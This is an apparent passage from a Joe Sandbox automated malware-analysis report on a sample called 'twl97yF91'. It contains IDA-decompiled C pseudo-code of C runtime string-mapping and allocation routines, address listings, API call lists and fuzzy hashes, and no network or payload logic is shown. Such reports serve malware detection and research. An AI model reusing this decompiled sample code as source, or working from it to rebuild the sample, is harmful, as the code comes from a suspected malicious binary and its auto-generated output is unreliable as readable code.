                                                                                                                                                                                                          										L45:
                                                                                                                                                                                                          										__eflags = _t184;
                                                                                                                                                                                                          										if(_t184 != 0) {
                                                                                                                                                                                                          											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                                                                                                                          											__eflags = _t141;
                                                                                                                                                                                                          											if(_t141 != 0) {
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												__eflags = _a24;
                                                                                                                                                                                                          												if(_a24 != 0) {
                                                                                                                                                                                                          													_push(_a24);
                                                                                                                                                                                                          													_push(_a20);
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          													_push(0);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											E004147AE(_t184);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L52;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t144 = 0xffffffe0;
                                                                                                                                                                                                          									_t179 = _t144 % _t174;
                                                                                                                                                                                                          									__eflags = _t144 / _t174 - 2;
                                                                                                                                                                                                          									if(_t144 / _t174 < 2) {
                                                                                                                                                                                                          										goto L44;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t52 = _t174 + 8; // 0x8
                                                                                                                                                                                                          									_t146 = _t174 + _t52;
                                                                                                                                                                                                          									__eflags = _t146 - 0x400;
                                                                                                                                                                                                          									if(_t146 > 0x400) {
                                                                                                                                                                                                          										_t147 = E0040B84D(0, _t179, _t182, _t146);
                                                                                                                                                                                                          										__eflags = _t147;
                                                                                                                                                                                                          										if(_t147 != 0) {
                                                                                                                                                                                                          											 *_t147 = 0xdddd;
                                                                                                                                                                                                          											_t147 =  &(_t147[4]);
                                                                                                                                                                                                          											__eflags = _t147;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t184 = _t147;
                                                                                                                                                                                                          										goto L45;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									E0040CFB0(_t146);
                                                                                                                                                                                                          									_t184 = _t189;
                                                                                                                                                                                                          									__eflags = _t184;
                                                                                                                                                                                                          									if(_t184 == 0) {
                                                                                                                                                                                                          										goto L52;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									 *_t184 = 0xcccc;
                                                                                                                                                                                                          									_t184 =  &(_t184[4]);
                                                                                                                                                                                                          									goto L45;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                                                                                                                          									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L52;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t150 = 0xffffffe0;
                                                                                                                                                                                                          							_t179 = _t150 % _t182;
                                                                                                                                                                                                          							if(_t150 / _t182 < 2) {
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t25 = _t182 + 8; // 0x8
                                                                                                                                                                                                          							_t152 = _t182 + _t25;
                                                                                                                                                                                                          							if(_t182 + _t25 > 0x400) {
                                                                                                                                                                                                          								_t153 = E0040B84D(0, _t179, _t182, _t152);
                                                                                                                                                                                                          								__eflags = _t153;
                                                                                                                                                                                                          								if(_t153 == 0) {
                                                                                                                                                                                                          									L27:
                                                                                                                                                                                                          									_v16 = _t153;
                                                                                                                                                                                                          									goto L29;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								 *_t153 = 0xdddd;
                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                          								_t153 =  &(_t153[4]);
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							E0040CFB0(_t152);
                                                                                                                                                                                                          							_t153 = _t189;
                                                                                                                                                                                                          							if(_t153 == 0) {
                                                                                                                                                                                                          								goto L27;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							 *_t153 = 0xcccc;
                                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t178 = _a16;
                                                                                                                                                                                                          				_t157 = _a12;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					_t178 = _t178 - 1;
                                                                                                                                                                                                          					if( *_t157 == 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t157 =  &(_t157[1]);
                                                                                                                                                                                                          					if(_t178 != 0) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t178 = _t178 | 0xffffffff;
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t160 = _a16 - _t178 - 1;
                                                                                                                                                                                                          				if(_t160 < _a16) {
                                                                                                                                                                                                          					_t160 = _t160 + 1;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_a16 = _t160;
                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                          			}











































                                                                                                                                                                                                          0x00417089
                                                                                                                                                                                                          0x00417090
                                                                                                                                                                                                          0x00417098
                                                                                                                                                                                                          0x0041709a
                                                                                                                                                                                                          0x004170a0
                                                                                                                                                                                                          0x004170a6
                                                                                                                                                                                                          0x004170bb
                                                                                                                                                                                                          0x004170c5
                                                                                                                                                                                                          0x004170cb
                                                                                                                                                                                                          0x004170ce
                                                                                                                                                                                                          0x004170d0
                                                                                                                                                                                                          0x004170d0
                                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                                          0x004170bd
                                                                                                                                                                                                          0x004170bb
                                                                                                                                                                                                          0x004170dd
                                                                                                                                                                                                          0x00417101
                                                                                                                                                                                                          0x00417101
                                                                                                                                                                                                          0x00417109
                                                                                                                                                                                                          0x004172bb
                                                                                                                                                                                                          0x004172be
                                                                                                                                                                                                          0x004172c1
                                                                                                                                                                                                          0x004172c4
                                                                                                                                                                                                          0x004172cb
                                                                                                                                                                                                          0x004172cb
                                                                                                                                                                                                          0x004172ce
                                                                                                                                                                                                          0x004172d1
                                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                                          0x004172d8
                                                                                                                                                                                                          0x004172de
                                                                                                                                                                                                          0x004172e4
                                                                                                                                                                                                          0x004172e7
                                                                                                                                                                                                          0x004172ea
                                                                                                                                                                                                          0x004172f3
                                                                                                                                                                                                          0x004172f6
                                                                                                                                                                                                          0x004173ef
                                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                                          0x004173f1
                                                                                                                                                                                                          0x004173f4
                                                                                                                                                                                                          0x004173f6
                                                                                                                                                                                                          0x004173f9
                                                                                                                                                                                                          0x004173fe
                                                                                                                                                                                                          0x004173ff
                                                                                                                                                                                                          0x00417402
                                                                                                                                                                                                          0x00417404
                                                                                                                                                                                                          0x00417406
                                                                                                                                                                                                          0x00417409
                                                                                                                                                                                                          0x0041740b
                                                                                                                                                                                                          0x0041740c
                                                                                                                                                                                                          0x00417411
                                                                                                                                                                                                          0x00417409
                                                                                                                                                                                                          0x00417412
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417412
                                                                                                                                                                                                          0x00417309
                                                                                                                                                                                                          0x0041730e
                                                                                                                                                                                                          0x00417311
                                                                                                                                                                                                          0x00417314
                                                                                                                                                                                                          0x00417316
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041732a
                                                                                                                                                                                                          0x0041732c
                                                                                                                                                                                                          0x0041732f
                                                                                                                                                                                                          0x00417331
                                                                                                                                                                                                          0x0041733a
                                                                                                                                                                                                          0x00417379
                                                                                                                                                                                                          0x00417379
                                                                                                                                                                                                          0x00417379
                                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                                          0x0041737b
                                                                                                                                                                                                          0x0041737d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417384
                                                                                                                                                                                                          0x0041739c
                                                                                                                                                                                                          0x0041739e
                                                                                                                                                                                                          0x004173a1
                                                                                                                                                                                                          0x004173a3
                                                                                                                                                                                                          0x004173bf
                                                                                                                                                                                                          0x004173c1
                                                                                                                                                                                                          0x004173c9
                                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                                          0x004173cb
                                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                                          0x004173a5
                                                                                                                                                                                                          0x004173cf
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004173d4
                                                                                                                                                                                                          0x0041733c
                                                                                                                                                                                                          0x0041733f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417341
                                                                                                                                                                                                          0x00417344
                                                                                                                                                                                                          0x00417349
                                                                                                                                                                                                          0x00417362
                                                                                                                                                                                                          0x00417368
                                                                                                                                                                                                          0x0041736a
                                                                                                                                                                                                          0x0041736c
                                                                                                                                                                                                          0x00417372
                                                                                                                                                                                                          0x00417372
                                                                                                                                                                                                          0x00417372
                                                                                                                                                                                                          0x00417375
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417375
                                                                                                                                                                                                          0x0041734b
                                                                                                                                                                                                          0x00417350
                                                                                                                                                                                                          0x00417352
                                                                                                                                                                                                          0x00417354
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417356
                                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041735c
                                                                                                                                                                                                          0x00417333
                                                                                                                                                                                                          0x00417333
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417117
                                                                                                                                                                                                          0x0041711a
                                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                                          0x004172ec
                                                                                                                                                                                                          0x00417414
                                                                                                                                                                                                          0x00417425
                                                                                                                                                                                                          0x00417425
                                                                                                                                                                                                          0x00417120
                                                                                                                                                                                                          0x00417126
                                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                                          0x0041712d
                                                                                                                                                                                                          0x00417130
                                                                                                                                                                                                          0x00417153
                                                                                                                                                                                                          0x00417155
                                                                                                                                                                                                          0x00417157
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                                          0x0041715d
                                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                                          0x004171a2
                                                                                                                                                                                                          0x004171a5
                                                                                                                                                                                                          0x004171a8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171c1
                                                                                                                                                                                                          0x004172aa
                                                                                                                                                                                                          0x004172ad
                                                                                                                                                                                                          0x004172b2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004172b5
                                                                                                                                                                                                          0x004171c7
                                                                                                                                                                                                          0x004171db
                                                                                                                                                                                                          0x004171dd
                                                                                                                                                                                                          0x004171e2
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171ef
                                                                                                                                                                                                          0x0041721a
                                                                                                                                                                                                          0x0041721c
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417263
                                                                                                                                                                                                          0x00417265
                                                                                                                                                                                                          0x00417265
                                                                                                                                                                                                          0x00417267
                                                                                                                                                                                                          0x00417277
                                                                                                                                                                                                          0x0041727d
                                                                                                                                                                                                          0x0041727f
                                                                                                                                                                                                          0x00417281
                                                                                                                                                                                                          0x00417282
                                                                                                                                                                                                          0x00417283
                                                                                                                                                                                                          0x00417286
                                                                                                                                                                                                          0x0041728c
                                                                                                                                                                                                          0x0041728f
                                                                                                                                                                                                          0x00417288
                                                                                                                                                                                                          0x00417288
                                                                                                                                                                                                          0x00417289
                                                                                                                                                                                                          0x00417289
                                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                                          0x004172a0
                                                                                                                                                                                                          0x004172a4
                                                                                                                                                                                                          0x004172a9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417267
                                                                                                                                                                                                          0x00417222
                                                                                                                                                                                                          0x00417223
                                                                                                                                                                                                          0x00417225
                                                                                                                                                                                                          0x00417228
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                                          0x0041722a
                                                                                                                                                                                                          0x0041722e
                                                                                                                                                                                                          0x00417233
                                                                                                                                                                                                          0x0041724c
                                                                                                                                                                                                          0x00417252
                                                                                                                                                                                                          0x00417254
                                                                                                                                                                                                          0x00417256
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725c
                                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041725f
                                                                                                                                                                                                          0x00417235
                                                                                                                                                                                                          0x0041723a
                                                                                                                                                                                                          0x0041723c
                                                                                                                                                                                                          0x0041723e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417240
                                                                                                                                                                                                          0x00417246
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417246
                                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                                          0x00417213
                                                                                                                                                                                                          0x00417213
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004171f4
                                                                                                                                                                                                          0x00417163
                                                                                                                                                                                                          0x00417164
                                                                                                                                                                                                          0x00417169
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                                          0x0041716b
                                                                                                                                                                                                          0x00417174
                                                                                                                                                                                                          0x0041718a
                                                                                                                                                                                                          0x00417190
                                                                                                                                                                                                          0x00417192
                                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041719d
                                                                                                                                                                                                          0x00417194
                                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0041719a
                                                                                                                                                                                                          0x00417176
                                                                                                                                                                                                          0x0041717b
                                                                                                                                                                                                          0x0041717f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417181
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00417181
                                                                                                                                                                                                          0x00417157
                                                                                                                                                                                                          0x00417109
                                                                                                                                                                                                          0x004170df
                                                                                                                                                                                                          0x004170e2
                                                                                                                                                                                                          0x004170e5
                                                                                                                                                                                                          0x004170e5
                                                                                                                                                                                                          0x004170e8
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004170ea
                                                                                                                                                                                                          0x004170ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004170ef
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004170ef
                                                                                                                                                                                                          0x004170f7
                                                                                                                                                                                                          0x004170fb
                                                                                                                                                                                                          0x004170fd
                                                                                                                                                                                                          0x004170fd
                                                                                                                                                                                                          0x004170fe
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02E318B0), ref: 004170C5
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                                                          • _memset.LIBCMT ref: 00417384
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                          • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.320815814.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.0000000000426000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000001.00000002.320815814.000000000044D000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3809854901-0
                                                                                                                                                                                                          • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                          • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02CC731A
                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,00423620), ref: 02CC732C
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC73F1
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC74B3
                                                                                                                                                                                                          • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 02CC74DE
                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 02CC7501
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC750B
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC7514
                                                                                                                                                                                                          • ___ansicp.LIBCMT ref: 02CC7545
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 02CC7570
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CC75C9
                                                                                                                                                                                                          • _memset.LIBCMT ref: 02CC75EB
                                                                                                                                                                                                          • ___convertcp.LIBCMT ref: 02CC7621
                                                                                                                                                                                                          • __freea.LIBCMT ref: 02CC7636
                                                                                                                                                                                                          • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 02CC7650
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: String__freea_malloc$___convertcp$ByteCharErrorLastMultiWide___ansicp_memset
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2918745354-0
                                                                                                                                                                                                          • Opcode ID: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                          • Instruction ID: 8b851e86a452177bd0091ad0d8ad5e5c3d0743f37d277b0fff0e4f8079d5e671
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e0241b6e147b769e02d4c25b4a62de63cd09900d226416504aadb47099bd534
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9B19F72900119EFDF119FA4CC808AEBFBAEF88358F25846DF919A6120D735CA59DF50
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00421320,0000000C,02CC0977,00000000,00000000,?,00000001,02CBC22D,02CBB993), ref: 02CC084E
                                                                                                                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 02CC0859
                                                                                                                                                                                                            • Part of subcall function 02CBE9D1: Sleep.KERNEL32(000003E8,00000000,?,02CC079F,KERNEL32.DLL,?,02CC07EB,?,00000001,02CBC22D,02CBB993), ref: 02CBE9DD
                                                                                                                                                                                                            • Part of subcall function 02CBE9D1: GetModuleHandleW.KERNEL32(00000001,?,02CC079F,KERNEL32.DLL,?,02CC07EB,?,00000001,02CBC22D,02CBB993), ref: 02CBE9E6
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC08B4
                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 02CC08C1
                                                                                                                                                                                                          • __lock.LIBCMT ref: 02CC08D5
                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 02CC08F3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                          • String ID: @.B$KERNEL32.DLL
                                                                                                                                                                                                          • API String ID: 4021795732-2520587274
                                                                                                                                                                                                          • Opcode ID: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                          • Instruction ID: 2f2af7f27fae14e56878f92a3f552f8457747c5ebdbbf68ecbbc8c165efe1185
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6494f875005ce20cdce955d8c22516ac3ccd9d7187ee8c814306de8b46833c7d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA11B471944701EED721EF75D8007CABBF1AF48310F60852ED4A9D32A1CB749641DF98
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5A45
                                                                                                                                                                                                            • Part of subcall function 02CBBAB4: __FF_MSGBANNER.LIBCMT ref: 02CBBAD7
                                                                                                                                                                                                            • Part of subcall function 02CBBAB4: __NMSG_WRITE.LIBCMT ref: 02CBBADE
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5AA9
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5B6D
                                                                                                                                                                                                          • _malloc.LIBCMT ref: 02CB5B97
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000001.00000002.321441344.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_2cb0000_twl97yF91.jbxd
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _malloc
                                                                                                                                                                                                          • String ID: 1.2.3
                                                                                                                                                                                                          • API String ID: 1579825452-2310465506
                                                                                                                                                                                                          • Opcode ID: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                                                          • Instruction ID: 711d9c3fd210e8a7da095d864a85cc320a0820f868d0f19300f1f0f599cd123e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb03aca1fc5991893fbdddb05e44545bf6cb9a06a6e9765b2a21d01904c984c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 236101B19887808FC7329F6988806ABFBE1FF85354F944D2ED1DA83600D775A54ACF52
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 83%
                                                                                                                                                                                                          			E004057B0(intOrPtr* __eax) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				void* __ebp;
                                                                                                                                                                                                          				intOrPtr* _t57;
                                                                                                                                                                                                          				char* _t60;
                                                                                                                                                                                                          				char _t62;
                                                                                                                                                                                                          				intOrPtr _t63;
                                                                                                                                                                                                          				char _t64;
                                                                                                                                                                                                          				intOrPtr _t65;
                                                                                                                                                                                                          				intOrPtr _t66;
                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                          				intOrPtr _t69;
                                                                                                                                                                                                          				intOrPtr _t70;
                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                          				intOrPtr _t79;
                                                                                                                                                                                                          				intOrPtr _t82;
                                                                                                                                                                                                          				intOrPtr* _t83;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				char* _t88;
                                                                                                                                                                                                          				char* _t89;
                                                                                                                                                                                                          				intOrPtr* _t91;
                                                                                                                                                                                                          				intOrPtr* _t93;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				signed int _t98;
                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t98 = _t97 | 0xffffffff;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t100 + 0xc)) = 0;
                                                                                                                                                                                                          				_t91 = __eax;
                                                                                                                                                                                                          				 *((intOrPtr*)(_t100 + 0x10)) = _t100 + 0x10;
                                                                                                                                                                                                          				if( *((intOrPtr*)(_t100 + 0x68)) == 0 || __eax == 0) {
                                                                                                                                                                                                          					__eflags = 0;
                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t93 = E0040B84D(0, _t86, __eax, 0x74);
                                                                                                                                                                                                          					_t101 = _t100 + 4;
                                                                                                                                                                                                          					if(_t93 == 0) {
                                                                                                                                                                                                          						L31:
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x20)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x24)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x28)) = 0;
                                                                                                                                                                                                          						 *((intOrPtr*)(_t93 + 0x44)) = 0;
